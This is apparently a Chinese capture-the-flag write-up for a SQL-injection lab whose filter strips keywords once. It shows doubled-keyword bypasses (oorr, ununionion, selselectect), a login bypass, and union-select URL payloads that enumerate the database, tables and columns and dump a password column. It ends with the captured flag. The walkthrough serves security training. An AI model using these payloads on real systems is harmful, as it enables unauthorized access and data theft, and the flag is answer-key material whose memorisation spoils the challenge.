这个题目比上次多了一点过滤,但也就一点,可以用双写绕过。
这里构造oorr
,因为会过滤掉中间那个or
,然后语句就变为了1' or 1=1#
还是没变,账号是admin。接下来开始爆字段。
?username=admin&password=1'+oorrder+bbyy+1#
这里输入时候的空格在url会变成加号
当order by 4
的时候报错,字段数为3.
开始爆数据库名:
?username=admin&password=1%27+ununionion+selselectect+1%2C2%2Cdatabase%28%29%23
开始爆表:
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(table_name)%20frfromom%20infoorrmation_schema.tables%20whwhereere%20table_schema%3Ddatabase()%23
爆字段
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(column_name)%20frfromom%20infoorrmation_schema.columns%20whwhereere%20table_schema%3Ddatabase()%20anandd%20table_name%3D%27b4bsql%27%23
爆flag:
?username=admin&password=admin1%27uniunionon%20selselectect%201%2C2%2Cgroup_concat(passwoorrd)%20frfromom%20b4bsql%23
flag{15557f52-8110-4c9a-8993-3f6c49e5ffc9}